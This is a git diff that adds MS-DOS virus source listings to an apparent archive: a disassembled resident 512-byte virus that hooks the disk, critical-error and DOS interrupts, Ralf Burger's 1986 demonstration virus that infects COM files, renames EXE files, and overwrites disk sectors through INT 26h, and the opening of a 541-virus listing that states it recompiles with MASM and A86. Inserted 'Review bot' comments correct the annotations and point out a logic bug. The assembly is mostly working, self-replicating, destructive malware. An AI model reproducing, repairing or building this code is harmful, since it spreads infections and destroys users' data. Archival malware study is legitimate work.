;0017F F3A5 __ + MOV DS,BX ;DS_Chg ;00181 8EDB __ + JB H00197 ;00183 7212 r_ + INT 20h ;B-TERM_norm:20h ;00185 CD20 _ +;--------------------------------------------------- +H00187: MOV SI,CX ;00187 8BF1 __ + MOV DS,[SI+2Ch] ;DS_Chg ;00189 8E5C2C _\, + LODSW ;0018C AD _ + DEC SI ;0018D 4E N + TEST AX,AX ;0018E 85C0 __ + JNZ H0018C ;00190 75FA u_ + ADD SI,+03h ;00192 83C603 ___ + MOV DX,SI ;00195 8BD6 __ +H00197: MOV AH,3Dh ;00197 B43D _= + CALL H001B0 ; . . . . . . . . . ;00199 E81400 ___ + MOV DX,[DI] ;0019C 8B15 __ + MOV [DI+04h],DX ;0019E 895504 _U_ + ADD [DI],CX ;001A1 010D __ + POP DX ;001A3 5A Z + PUSH DX ;001A4 52 R + PUSH CS ;001A5 0E _ + POP ES ;001A6 07 _ + PUSH CS ;001A7 0E _ + POP DS ;001A8 1F _ + PUSH DS ;001A9 1E _ + MOV AL,50h ;001AA B050 _P + PUSH AX ;001AC 50 P + MOV AH,3Fh ;001AD B43F _? + RET ;RET_Far ;001AF CB _ +;--------------------------------------------------- +H001B0: INT 21h ;Indef_INT:21h-AH ;001B0 CD21 _! 
+ JB H001CD ;001B2 7219 r_ + MOV BX,AX ;001B4 8BD8 __ + PUSH BX ;001B6 53 S + MOV AX,1220h ;001B7 B82012 _ _ + INT 2Fh ;3-Prt_Splr_Ctrl ;001BA CD2F _/ + MOV BL,ES:[DI] ;ES_Ovrd ;001BC 268A1D &__ + MOV AX,1216h ;001BF B81612 ___ + INT 2Fh ;3-Prt_Splr_Ctrl ;001C2 CD2F _/ + POP BX ;001C4 5B [ + PUSH ES ;001C5 06 _ + POP DS ;001C6 1F _ + ADD DI,+11h ;001C7 83C711 ___ + MOV CX,0200h ;001CA B90002 ___ +H001CD: RET ;RET_Near ;001CD C3 _ +;--------------------------------------------------- + STI ;001CE FB _ + PUSH ES ;001CF 06 _ + PUSH SI ;001D0 56 V + PUSH DI ;001D1 57 W + PUSH BP ;001D2 55 U + PUSH DS ;001D3 1E _ + PUSH CX ;001D4 51 Q + CALL H001B6 ; . . . . . . . . . ;001D5 E8DEFF ___ + MOV BP,CX ;001D8 8BE9 __ + MOV SI,[DI+04h] ;001DA 8B7504 _u_ + POP CX ;001DD 59 Y + POP DS ;001DE 1F _ + CALL H00211 ; . . . . . . . . . ;001DF E82F00 _/_ + JB H0020A ;001E2 7226 r& + CMP SI,BP ;001E4 3BF5 ;_ + JNB H0020A ;001E6 7322 s" + PUSH AX ;001E8 50 P + MOV AL,ES:[DI-04h] ;ES_Ovrd ;001E9 268A45FC &_E_ + NOT AL ;001ED F6D0 __ + AND AL,1Fh ;001EF 241F $_ + JNZ H00209 ;001F1 7516 u_ + ADD SI,ES:[DI] ;ES_Ovrd ;001F3 260335 &_5 + XCHG SI,ES:[DI+04h] ;ES_Ovrd ;001F6 26877504 &_u_ + ADD ES:[DI],BP ;ES_Ovrd ;001FA 26012D &_- + CALL H00211 ; . . . . . . . . . ;001FD E81100 ___ + MOV ES:[DI+04h],SI ;ES_Ovrd ;00200 26897504 &_u_ + LAHF ;00204 9F _ + SUB ES:[DI],BP ;ES_Ovrd ;00205 26292D &)- + SAHF ;00208 9E _ +H00209: POP AX ;00209 58 X +H0020A: POP BP ;0020A 5D ] + POP DI ;0020B 5F _ + POP SI ;0020C 5E ^ + POP ES ;0020D 07 _ + RET 0002h ;RET_Far:0002h ;0020E CA0200 ___ +;--------------------------------------------------- +H00211: MOV AH,3Fh ;00211 B43F _? + PUSHF ;00213 9C _ + PUSH CS ;00214 0E _ + CALL H0023A ; . . . . . . . . . ;00215 E82200 _"_ + RET ;RET_Near ;00218 C3 _ +;--------------------------------------------------- + CMP AH,3Fh ;00219 80FC3F __? 
+ JZ H001CE ;0021C 74B0 t_ + PUSH DS ;0021E 1E _ + PUSH ES ;0021F 06 _ + PUSH AX ;00220 50 P + PUSH BX ;00221 53 S + PUSH CX ;00222 51 Q + PUSH DX ;00223 52 R + PUSH SI ;00224 56 V + PUSH DI ;00225 57 W + CMP AH,3Eh ;00226 80FC3E __> + JZ H0023F ;00229 7414 t_ + CMP AX,4B00h ;0022B 3D004B =_K + MOV AH,3Dh ;0022E B43D _= + JZ H00241 ;00230 740F t_ + POP DI ;00232 5F _ + POP SI ;00233 5E ^ + POP DX ;00234 5A Z + POP CX ;00235 59 Y + POP BX ;00236 5B [ + POP AX ;00237 58 X + POP ES ;00238 07 _ + POP DS ;00239 1F _ +H0023A: JMP Word Ptr CS:[0004h] + ;Mem_Brch:CS:[0004h];0023A 2EFF2E0400 ._.__ +;--------------------------------------------------- +H0023F: MOV AH,45h ;0023F B445 _E +H00241: CALL H001B0 ; . . . . . . . . . ;00241 E86CFF _l_ + JB H00232 ;00244 72EC r_ + SUB AX,AX ;00246 2BC0 +_ + MOV [DI+04h],AX ;00248 894504 _E_ + MOV Byte Ptr [DI-0Fh],02h ;0024B C645F102 _E__ + CLD ;0024F FC _ + MOV DS,AX ;DS_Chg ;00250 8ED8 __ + MOV SI,004Ch ;00252 BE4C00 _L_ + LODSW ;00255 AD _ + PUSH AX ;00256 50 P + LODSW ;00257 AD _ + PUSH AX ;00258 50 P + PUSH [SI+40h] ;00259 FF7440 _t@ + PUSH [SI+42h] ;0025C FF7442 _tB + LDS DX,CS:[SI-50h] ;CS_Ovrd ;0025F 2EC554B0 ._T_ + MOV AX,2513h ;00263 B81325 __% + INT 21h ;1-Set_Int_Vctr ;00266 CD21 _! + PUSH CS ;00268 0E _ + POP DS ;00269 1F _ + MOV DX,0204h ;0026A BA0402 ___ + MOV AL,24h ;0026D B024 _$ + INT 21h ;Indef_INT:21h-25h ;0026F CD21 _! + PUSH ES ;00271 06 _ + POP DS ;00272 1F _ + MOV AL,[DI-04h] ;00273 8A45FC _E_ + AND AL,1Fh ;00276 241F $_ + CMP AL,1Fh ;00278 3C1F <_ + JZ H00284 ;0027A 7408 t_ + MOV AX,[DI+17h] ;0027C 8B4517 _E_ + SUB AX,4F43h ;0027F 2D434F -CO + JNZ H002C3 ;00282 753F u? 
+H00284: XOR [DI-04h],AL ;00284 3045FC 0E_ + MOV AX,[DI] ;00287 8B05 __ + CMP AX,CX ;00289 3BC1 ;_ +;--------------------------------------------------- + DB "r6" ;0028B 7236 +;--------------------------------------------------- + ADD AX,CX ;0028D 03C1 __ + JB H002C3 ;0028F 7232 r2 + TEST Byte Ptr [DI-0Dh],04h ;00291 F645F304 _E__ + JNZ H002C3 ;00295 752C u, + LDS SI,[DI-0Ah] ;00297 C575F6 _u_ + DEC AX ;0029A 48 H + SHR AH,1 ;0029B D0EC __ + AND AH,[SI+04h] ;0029D 226404 "d_ + JZ H002C3 ;002A0 7421 t! + MOV AX,0020h ;002A2 B82000 _ _ + MOV DS,AX ;DS_Chg ;002A5 8ED8 __ + SUB DX,DX ;002A7 2BD2 +_ + CALL H00211 ; . . . . . . . . . ;002A9 E865FF _e_ + MOV SI,DX ;002AC 8BF2 __ + PUSH CX ;002AE 51 Q + LODSB ;002AF AC _ + CMP AL,CS:[SI+07h] ;CS_Ovrd ;002B0 2E3A4407 .:D_ + JNZ H002DD ;002B4 7527 u' + LOOP H002AF ;002B6 E2F7 __ + POP CX ;002B8 59 Y + OR Byte Ptr ES:[DI-04h],1Fh + ;ES_Ovrd ;002B9 26804DFC1F &_M__ + OR Byte Ptr ES:[DI-0Bh],40h + ;ES_Ovrd ;002BE 26804DF540 &_M_@ +H002C3: MOV AH,3Eh ;002C3 B43E _> + CALL H00213 ; . . . . . . . . . ;002C5 E84BFF _K_ + OR Byte Ptr ES:[DI-0Ch],40h + ;ES_Ovrd ;002C8 26804DF440 &_M_@ + POP DS ;002CD 1F _ + POP DX ;002CE 5A Z + MOV AX,2524h ;002CF B82425 _$% + INT 21h ;1-Set_Int_Vctr ;002D2 CD21 _! + POP DS ;002D4 1F _ + POP DX ;002D5 5A Z + MOV AL,13h ;002D6 B013 __ + INT 21h ;Indef_INT:21h-25h ;002D8 CD21 _! + JMP H00232 ;002DA E955FF _U_ +;--------------------------------------------------- +H002DD: POP CX ;002DD 59 Y + MOV SI,ES:[DI] ;ES_Ovrd ;002DE 268B35 &_5 + MOV ES:[DI+04h],SI ;ES_Ovrd ;002E1 26897504 &_u_ + MOV AH,40h ;002E5 B440 _@ + INT 21h ;2-Wr_Fl_Hdl ;002E7 CD21 _! + JB H002BE ;002E9 72D3 r_ + MOV ES:[DI],SI ;ES_Ovrd ;002EB 268935 &_5 + MOV ES:[DI+04h],DX ;ES_Ovrd ;002EE 26895504 &_U_ + PUSH CS ;002F2 0E _ + POP DS ;002F3 1F _ + MOV DL,08h ;002F4 B208 __ + MOV AH,40h ;002F6 B440 _@ + INT 21h ;2-Wr_Fl_Hdl ;002F8 CD21 _! 
+ JMP Short H002B9 ;002FA EBBD __ +;--------------------------------------------------- + IRET ;002FC CF _ +;--------------------------------------------------- + DB "666" ;002FD 363636 +;--------------------------------------------------- + + +P00100 ENDP + +CODE ENDS + END H00100 + +;------------------------------------------------------------------------------- + +INT 2F - Multiplex - DOS 3.3+ - SET DISK INTERRUPT HANDLER + AH = 13h + DS:DX -> interrupt handler disk driver calls on read/write + ES:BX = address to restore INT 13 to on system halt (exit from root + shell) +Return: DS:DX from previous invocation of this function + ES:BX from previous invocation of this function +Notes: most DOS 3.3+ disk access is via the vector in DS:DX, although a few + functions are still invoked via an INT 13 instruction + this is a dangerous security loophole for any virus-monitoring software + which does not trap this call (at least two viruses are known to use + it to get the original ROM entry point) diff --git a/MSDOS/Virus.MSDOS.Unknown.512.asm b/MSDOS/Virus.MSDOS.Unknown.512.asm new file mode 100644 index 00000000..6cfc94ab --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.512.asm 
@@ -0,0 +1,269 @@ +;PROGRAM NAME: 512.com +;------------------------------------------------- +H00100: MOV AH,30h + INT 21h ;DOS Version# + MOV SI,0004h + MOV DS,SI ;SEGMENT OPERATION + CMP Byte Ptr AH,1Eh + LDS AX,[SI+08h] + JB H0011B ; . . . . . . . . . + MOV AH,13h + INT 2Fh ;Print Spooler Ctrl + PUSH DS ;SEGMENT OPERATION + PUSH DX + INT 2Fh ;Print Spooler Ctrl + POP AX + POP DS ;SEGMENT OPERATION +H0011B: MOV DI,00F8h + STOSW + MOV AX,DS + STOSW + MOV DS,SI ;SEGMENT OPERATION + LDS AX,[SI+40h] + STOSW + CMP AX,0121h + MOV AX,DS + STOSW + PUSH ES ;SEGMENT OPERATION + PUSH DI + JNZ H00139 ; . . . . . . . . . + SHL Word Ptr SI,1 + MOV CX,0100h + REPZ + CMPSW +H00139: PUSH CS ;SEGMENT OPERATION + POP DS ;SEGMENT OPERATION + JZ H00187 ; . . . . . . . . . + MOV AH,52h + INT 21h ;INDEF FUNCTION + PUSH ES ;SEGMENT OPERATION + MOV SI,00F8h + SUB DI,DI + LES AX,ES:[BX+12h] + MOV DX,ES:[DI+02h] + MOV CX,0104h + REPZ + MOVSW + MOV DS,CX ;SEGMENT OPERATION + MOV DI,0016h + MOV Word Ptr [DI+6E],0121h + MOV [DI+70h],ES + POP DS ;SEGMENT OPERATION + MOV [BX+14h],DX + MOV DX,CS + MOV DS,DX ;SEGMENT OPERATION + MOV BX,[DI-14h] + DEC Byte Ptr BH + MOV ES,BX ;SEGMENT OPERATION + CMP DX,[DI] + MOV DS,[DI] ;SEGMENT OPERATION + MOV DX,[DI] + DEC DX + MOV DS,DX ;SEGMENT OPERATION + MOV SI,CX + MOV DX,DI + MOV CL,08h + REPZ + MOVSW + MOV DS,BX ;SEGMENT OPERATION + JB H00197 ; . . . . . . . . . + INT 20h ;TERMINATE normally +;------------------------------------------------- +H00187: MOV SI,CX + MOV DS,[SI+2Ch] ;SEGMENT OPERATION +H0018C: LODSW ; . . . . . . . . . + DEC SI + TEST AX,AX + JNZ H0018C ; . . . . . . . . . + ADD Word Ptr SI,+03h + MOV DX,SI +H00197: MOV AH,3Dh + CALL H001B0 ; . . . . . . . . . 
+ MOV DX,[DI] + MOV [DI+04h],DX + ADD [DI],CX + POP DX + PUSH DX + PUSH CS ;SEGMENT OPERATION + POP ES ;SEGMENT OPERATION + PUSH CS ;SEGMENT OPERATION + POP DS ;SEGMENT OPERATION + PUSH DS ;SEGMENT OPERATION + MOV AL,50h + PUSH AX + MOV AH,3Fh + RETF +;------------------------------------------------- +H001B0: INT 21h ;INDEF FUNCTION + JB H001CD ; . . . . . . . . . + MOV BX,AX +H001B6: PUSH BX + MOV AX,1220h + INT 2Fh ;Print Spooler Ctrl + MOV BL,ES:[DI] + MOV AX,1216h + INT 2Fh ;Print Spooler Ctrl + POP BX + PUSH ES ;SEGMENT OPERATION + POP DS ;SEGMENT OPERATION + ADD Word Ptr DI,+11h + MOV CX,0200h +H001CD: RET +;------------------------------------------------- +H001CE: STI + PUSH ES ;SEGMENT OPERATION + PUSH SI + PUSH DI + PUSH BP + PUSH DS ;SEGMENT OPERATION + PUSH CX + CALL H001B6 ; . . . . . . . . . + MOV BP,CX + MOV SI,[DI+04h] + POP CX + POP DS ;SEGMENT OPERATION + CALL H00211 ; . . . . . . . . . + JB H0020A ; . . . . . . . . . + CMP SI,BP + JNB H0020A ; . . . . . . . . . + PUSH AX + MOV AL,ES:[DI-04h] + NOT Byte Ptr AL + AND AL,1Fh + JNZ H00209 ; . . . . . . . . . + ADD SI,ES:[DI] + XCHG SI,ES:[DI+04h] + ADD ES:[DI],BP ;SEGMENT OPERATION + CALL H00211 ; . . . . . . . . . + MOV ES:[DI+04h],SI ;SEGMENT OPERATION + LAHF + SUB ES:[DI],BP ;SEGMENT OPERATION + SAHF +H00209: POP AX +H0020A: POP BP + POP DI + POP SI + POP ES ;SEGMENT OPERATION + RETF 0002h +;------------------------------------------------- +H00211: MOV AH,3Fh +H00213: PUSHF + PUSH CS ;SEGMENT OPERATION + CALL H0023A ; . . . . . . . . . + RET +;------------------------------------------------- + CMP Byte Ptr AH,3Fh + JZ H001CE ; . . . . . . . . . + PUSH DS ;SEGMENT OPERATION + PUSH ES ;SEGMENT OPERATION + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + CMP Byte Ptr AH,3Eh + JZ H0023F ; . . . . . . . . . + CMP AX,4B00h + MOV AH,3Dh + JZ H00241 ; . . . . . . . . . 
+H00232: POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + POP ES ;SEGMENT OPERATION + POP DS ;SEGMENT OPERATION +H0023A: JMP Far CS:[H00004h] +;------------------------------------------------- +H0023F: MOV AH,45h +H00241: CALL H001B0 ; . . . . . . . . . + JB H00232 ; . . . . . . . . . + SUB AX,AX + MOV [DI+04h],AX + MOV Byte Ptr [DI-0Fh],02h + CLD + MOV DS,AX ;SEGMENT OPERATION + MOV SI,004Ch + LODSW ; . . . . . . . . . + PUSH AX + LODSW ; . . . . . . . . . + PUSH AX + PUSH [SI+40h] + PUSH [SI+42h] + LDS DX,CS:[SI-50h] + MOV AX,2513h + INT 21h ;Set Intrpt Vector + PUSH CS ;SEGMENT OPERATION + POP DS ;SEGMENT OPERATION + MOV DX,0204h + MOV AL,24h + INT 21h ;Write Random Rcds + PUSH ES ;SEGMENT OPERATION + POP DS ;SEGMENT OPERATION + MOV AL,[DI-04h] + AND AL,1Fh + CMP AL,1Fh + JZ H00284 ; . . . . . . . . . + MOV AX,[DI+17h] + SUB AX,4F43h + JNZ H002C3 ; . . . . . . . . . +H00284: XOR [DI-04h],AL + MOV AX,[DI] + CMP AX,CX + JB H002C3 ; . . . . . . . . . + ADD AX,CX + JB H002C3 ; . . . . . . . . . + TEST Byte Ptr [DI-0Dh],04h + JNZ H002C3 ; . . . . . . . . . + LDS SI,[DI-0Ah] + DEC AX + SHR Byte Ptr AH,1 + AND AH,[SI+04h] + JZ H002C3 ; . . . . . . . . . + MOV AX,0020h + MOV DS,AX ;SEGMENT OPERATION + SUB DX,DX + CALL H00211 ; . . . . . . . . . + MOV SI,DX + PUSH CX +H002AF: LODSB ; . . . . . . . . . + CMP AL,CS:[SI+07h] + JNZ H002DD ; . . . . . . . . . + LOOP H002AF ; . . . . . . . . . + POP CX +H002B9: OR Byte Ptr ES:[DI-04h],1Fh +H002BE: OR Byte Ptr ES:[DI-0Bh],40h +H002C3: MOV AH,3Eh + CALL H00213 ; . . . . . . . . . + OR Byte Ptr ES:[DI-0Ch],40h + POP DS ;SEGMENT OPERATION + POP DX + MOV AX,2524h + INT 21h ;Set Intrpt Vector + POP DS ;SEGMENT OPERATION + POP DX + MOV AL,13h + INT 21h ;Write Random Rcds + JMP H00232 +;------------------------------------------------- +H002DD: POP CX + MOV SI,ES:[DI] + MOV ES:[DI+04h],SI ;SEGMENT OPERATION + MOV AH,40h + INT 21h ;Write File/Device + JB H002BE ; . . . . . . . . . 
+ MOV ES:[DI],SI ;SEGMENT OPERATION + MOV ES:[DI+04h],DX ;SEGMENT OPERATION + PUSH CS ;SEGMENT OPERATION + POP DS ;SEGMENT OPERATION + MOV DL,08h + MOV AH,40h + INT 21h ;Write File/Device + JMP Short H002B9 +;------------------------------------------------- + IRET +;------------------------------------------------- + ADD SS:[BX+SI],AL ;SEGMENT OPERATION + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.541.asm b/MSDOS/Virus.MSDOS.Unknown.541.asm new file mode 100644 index 00000000..cfdc5a30 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.541.asm 
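Review bot: The disassembler's INT 21h annotations in the routine at `H00241` are keyed off AL and are wrong: after `MOV AX,2513h` hooks INT 13h, AH is still 25h, so `MOV AL,24h / INT 21h` is not "Write Random Rcds" but a second Set-Vector call that points INT 24h (the DOS critical-error handler) into the virus — which is why a failed write during infection never reaches the Abort/Retry/Fail prompt — and `MOV AL,13h / INT 21h` at `H002C3` restores INT 13h rather than writing records. Likewise `MOV AH,13h / INT 2Fh` near `H00100` is not "Print Spooler Ctrl": AH=13h on INT 2Fh is the DOS 3.3+ set-disk-interrupt-handler call (the 512-x sibling listing in this commit appends the reference text for it), and the back-to-back pair of calls with the pushed DS:DX presumably reads the current handler and restores it, so this is where the virus obtains the handler DOS itself uses for disk I/O. I would replace the comments with `;Set INT 13h vector`, `;Set INT 24h vector (critical-error handler -> virus)`, `;Restore INT 13h vector` and `;Get/set disk interrupt handler (DOS 3.3+)`. The trailing `ADD SS:[BX+SI],AL` after the final `IRET` is leftover bytes decoded as an instruction and would be clearer as a `DB` directive.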
@@ -0,0 +1,446 @@ + page 70,120 + Name VIRUS +;************************************************************************* + +; Program Virus Ver.: 1.1 +; Copyright by R. Burger 1986 +; This is a demonstration program for computer +; viruses. It has the ability to replicate itself, +; and thereby modify other programs +;************************************************************************* + + + +Code Segment + Assume CS:Code +progr equ 100h + ORG progr + +;************************************************************************* + +; The three NOP's serve as the marker byte of the +; virus which will allow it to identify a virus +;************************************************************************* + +MAIN: + nop + nop + nop + +;************************************************************************* + +; Initialize the pointers +;************************************************************************* + + mov ax,00 + mov es:[pointer],ax + mov es:[counter],ax + mov es:[disks],al + +;************************************************************************* + +; Get the selected drive +;************************************************************************* + + mov ah,19h ; drive? + int 21h + +;************************************************************************* + +; Get the current path on the current drive +;************************************************************************* + + mov cs:drive,al ; save drive + mov ah,47h ; dir? + mov dh,0 + add al,1 + mov dl,al ; in actual drive + lea si,cs:old_path + int 21h + +;************************************************************************* + +; Get the number of drives present. +; If only one drive is present, the pointer for +; search order will be set to search order + 6 +;************************************************************************* + + mov ah,0eh ; how many disks + mov dl,0 ; + int 21h + + mov al,01 + cmp al,01 ; one drive? 
+ jnz hups3 + mov al,06 + +hups3: mov ah,0 + lea bx,search_order + add bx,ax + add bx,0001h + mov cs:pointer,bx + clc + +;************************************************************************* + +; Carry is set, if no more .COM's are found. +; Then, to avoid unnecessary work, .EXE files will +; be renamed to .COM file and infected. +; This causes the error message "Program too lrage +; to fit in memory" when starting larger infected +; EXE programs. +;************************************************************************* + +change_disk: + jnc no_name_change + mov ah,17h ; change exe to com + lea dx,cs:maske_exe + int 21h + cmp al,0ffh + jnz no_name_change ; .EXE found? + +;************************************************************************* + +; If neither .COM nor .EXE is found, then sectors will +; be overwritten depending on the system time in +; milliseconds. This is the time of the complete +; "infection" of a storage medium. The virus can find +; nothing more to infect and starts its destruction. +;************************************************************************* + + mov ah,2ch ; read system clock + int 21h + mov bx,cs:pointer + mov al,cs:[bx] + mov bx,dx + mov cx,2 + mov dh,0 + int 26h ; write crap on disk + +;************************************************************************* + +; Check if the end of the search order table has been +; reached. If so, end. +;************************************************************************* + +no_name_change: + mov bx,cs:pointer + dec bx + mov cs:pointer,bx + mov dl,cs:[bx] + cmp dl,0ffh + jnz hups2 + jmp hops + +;************************************************************************* + +; Get new drive from search order table and +; select it. 
+;************************************************************************* + +hups2: + mov ah,0eh + int 21h ; change disk + +;************************************************************************* + +; Start in the root directory +;************************************************************************* + + mov ah,3bh ; change path + lea dx,path + int 21h + jmp find_first_file + +;************************************************************************* + +; Starting from the root, search for the first subdir +; First convert all .EXE files to .COM in the old +; directory. +;************************************************************************* + +find_first_subdir: + mov ah,17h ; change exe to com + lea dx,cs:maske_exe + int 21h + mov ah,3bh ; use root dir + lea dx,path + int 21h + mov ah,04eh ;Search for first subdirectory + mov cx,00010001b ; dir mask + lea dx,maske_dir + int 21h + jc change_disk + + mov bx,CS:counter + INC BX + DEC bx + jz use_next_subdir + +;************************************************************************* + +; Search for the next subdir. If no more directories +; are found, the drive will be changed. +;************************************************************************* + +find_next_subdir: + mov ah,4fh ; search for next subdir + int 21h + jc change_disk + dec bx + jnz find_next_subdir + +;************************************************************************* + +; Select found directory +;************************************************************************* + +use_next_subdir: + mov ah,2fh ; get dta address + int 21h + add bx,1ch + mov es:[bx],'\ ' ; address of name in dta + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3bh ; change path + int 21h + pop ds + mov bx,cs:counter + inc bx + mov CS:counter,bx + +;************************************************************************* + +; Find first .COM file in the current directory. +; If there are non, search the next directory. 
+;************************************************************************* + +find_first_file: + mov ah,04eh ; Search for first + mov cx,00000001b ; mask + lea dx,maske_com ; + int 21h + jc find_first_subdir + jmp check_if_ill + +;************************************************************************* + +; If the program is already infected, search for +; the next program. +;************************************************************************* + +find_next_file: + mov ah,4fh ; search for next + int 21h + jc find_first_subdir + +;************************************************************************* + +; Check if already infected by the virus. +;************************************************************************* + +check_if_ill: + mov ah,3dh ; open channel + mov al,02h ; read/write + mov dx,9eh ; address of name in dta + int 21h + mov bx,ax ; save channel + mov ah,3fh ; read file + mov cx,buflen ; + mov dx,buffer ; write in buffer + int 21h + mov ah,3eh ; CLODE FILE + int 21h + +;************************************************************************* + +; Here we search for three NOP's. +; If present, there is already an infection. We must +; then continue the search. +;************************************************************************* + + mov bx,cs:[buffer] + cmp bx,9090h + jz find_next_file + +;************************************************************************* + +; Bypass MS-DOS write protection if present +;************************************************************************* + + mov ah,43h ; write enable + mov al,0 + mov dx,9eh ; address of name in dta + int 21h + mov ah,43h + mov al,01h + and cx,11111110b + int 21h + +;************************************************************************* + +; Open file for write access. 
+;************************************************************************* + + mov ah,3dh ; open channel + mov al,02h ; read/write + mov dx,9eh ; address of name in dta + int 21h + +;************************************************************************* + +; Read date entry of program and save for future use. +;************************************************************************* + + mov bx,ax ; channel + mov ah,57h ; get date + mov al,0 + int 21h + push cx ; save date + push dx + +;************************************************************************* + +; The jump located at address 0100h of the program +; will be saved for future use. +;************************************************************************* + + mov dx,cs:[conta] ; save old jmp + mov cs:[jmpbuf],dx + mov dx,cs:[buffer+1] ; save new jump + lea cx,cont-100h + sub dx,cx + mov cs:[conta],dx + +;************************************************************************* + +; The virus copies itself to the start of the file +;************************************************************************* + + mov ah,40h ; write virus + mov cx,buflen ; length buffer + lea dx,main ; write virus + int 21h + +;************************************************************************* + +; Enter the old creation date of the file. +;************************************************************************* + + mov ah,57h ; write date + mov al,1 + pop dx + pop cx ; restore date + int 21h + +;************************************************************************* + +; Close the file. +;************************************************************************* + + mov ah,3eh ; close file + int 21h + +;************************************************************************* + +; restore the old jump address. +; The virus saves at address "conta' the jump which +; was at the start of the host program. +; This is done to preserve the executability of the +; host program as much as possible. 
+; After saving itstill works with the jump address +; contained in the virus. The jump address in the +; virus differs from the jump address in memory +; +;************************************************************************* + + mov dx,cs:[jmpbuf] ; restore old jmp + mov cs:[conta],dx +hops: nop + call use_old + +;************************************************************************* + +; Continue with the host program. +;************************************************************************* + +cont db 0e9h ; make jump +conta dw 0 + mov ah,00 + int 21h + +;************************************************************************* + +; reactivate the selected drive at the start of the +; program. +;************************************************************************* + +use_old: + mov ah,0eh ; use old drive + mov dl,cs:drive + int 21h + +;************************************************************************* + +; Reactivate the selected path at the start of the +; program. +;************************************************************************* + + mov ah,3bh ; use old dir + lea dx,old_path-1 ; get old path and backslash + int 21h + ret + + +search_order db 0ffh,1,0,2,3,0ffh,00,0ffh +pointer dw 0000 ; pointer f. search order +counter dw 0000 ; counter f. nth search +disks db 0 ; number of disks + + +maske_com db "*.com",00 ; search for com files +maske_dir db "*",00 ; search dir's +maske_exe db 0ffh,0,0,0,0,0,00111111b + db 0,"????????exe",0,0,0,0 + db 0,"????????com",0 +maske_all db 0ffh,0,0,0,0,0,00111111b + db 0,"???????????",0,0,0,0 + db 0,"????????com",0 + +buffer equ 0e000h ; a safe place + +buflen equ 230h ; length of virus !!!!!! + ; careful + ; if changing !!!!!! + +jmpbuf equ buffer+buflen ; a safe place for jump +path db "\",0 ; first path +drive db 0 ; actual drive +back_slash db "\" +old_path db 32 dup(?) 
; old path + +code ends + +end main + +;************************************************************************* +; WHAT THE PROGRAM DOES: +; +; When the program is started, the first COM file in the root +; directory is infected. You can't see any changes to the +; directory entries. But if you look at the hex dump of an +; infected program, you can see the marker, which in this case +; consists of three NOP's (hex 90). WHen the infected program +; is started, the virus will first replicate itself, and then +; try to run the host program. It may run or it may not, but +; it will infect another program. This continues until all +; the COM files are infected. The next time it is run, all +; of the EXE files are changed to COM files so that they can +; be infected. In addition, the manipulation task of the virus +; begins, which consists of the random destruction of disk +; sectors. +;************************************************************************* +  \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.560.asm b/MSDOS/Virus.MSDOS.Unknown.560.asm new file mode 100644 index 00000000..988d5204 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.560.asm 
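Review bot: The drive-count test in the prologue is dead code: INT 21h/AH=0Eh returns the number of logical drives in AL, but the next instruction `mov al,01` overwrites it before `cmp al,01`, so the compare always succeeds, `jnz hups3` is never taken and `mov al,06` always runs — the search-order pointer is unconditionally set to `search_order+7`, contrary to the `; one drive?` comment and the header paragraph above it. If the listing is meant to be kept as archived, the defect should at least be marked rather than silently preserved; I would add after `mov al,01`: `; BUG (original): clobbers the drive count just returned in AL, so the "one drive" path below is always taken`. Note also that `int 26h` in `change_disk` is a live absolute-sector write (CX=2 sectors starting at sector DX taken from the clock, drive byte from the search table), and unlike the 560 sibling this file carries no handling warning at the top; a one-line caveat that it must not be assembled or run outside an isolated VM would be appropriate.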
@@ -0,0 +1,464 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; + +PAGE 70,120 + +;; +;; +;; Name Virus: 541-Virus 14 Sept 1990 +;; Suggested Alias: NOP-Virus +;; Variant: 537-Virus, 560-Virus +;; +;; Last Reported: September 1990 +;; 'Isolated': The Hague, The Netherlands +;; by: Righard Zwienenberg 2:512/2.3@fidonet +;; +;; Author: Ralf Burger in 1986 for his book: +;; VIRUSES, A HIGH TECHNICAL DISEASE +;; +;; +;; The code of this virus was built into a MOVE-util. It was imple- +;; mented wrong. The virus went straight to the destruction code. +;; I've taken the code out and reconstructed it to its original +;; form. Because I had a listing of Ralf Burger's book I have placed +;; his own comments behind the code, although I've translated it into +;; English. The labels used, are also his. +;; +;; I've put three comments myself in the code. These can be recog- +;; nized by the starting ;; of it. +;; +;; Edwin Cleton, the one who send me the MOVE util for examination +;; downloaded it from a BBS. So far there are no damage reports. 
+;; The move-util checked the system's date. If the date is 1 Aug +;; or later of any year, the virus was called. +;; +;; +;; +;; This sourcelisting can be recompiled with MASM 4.0+ and A86. For +;; compilation with A86 you must specify 'conta' and 'disks' as a word +;; else the definition will conflict with what A86 previously thinks. +;; +;; +;; +;; Virus-Description: +;; ------------------ +;; +;; The virus infects the first COM-file in the ROOT-Directory. The +;; virus overwrites the first 230h bytes of the file. When an infected +;; file is executed it will infect one other .COM-file. The system will +;; crash mostly afterwards because the overwritten part is not stored. +;; When COMMAND.COM is infected on the HDU, the system will not reboot +;; because COMMAND.COM is complete. Each reboot COMMAND.COM will infect +;; one other .COM-File and the computer crashes. When all .COM-files +;; are infected, .EXE-files will be renamed (FCB) to .COM to become +;; infected. When all .COM and .EXE-files are infected, the virus will +;; write to sectors on disk depending on the 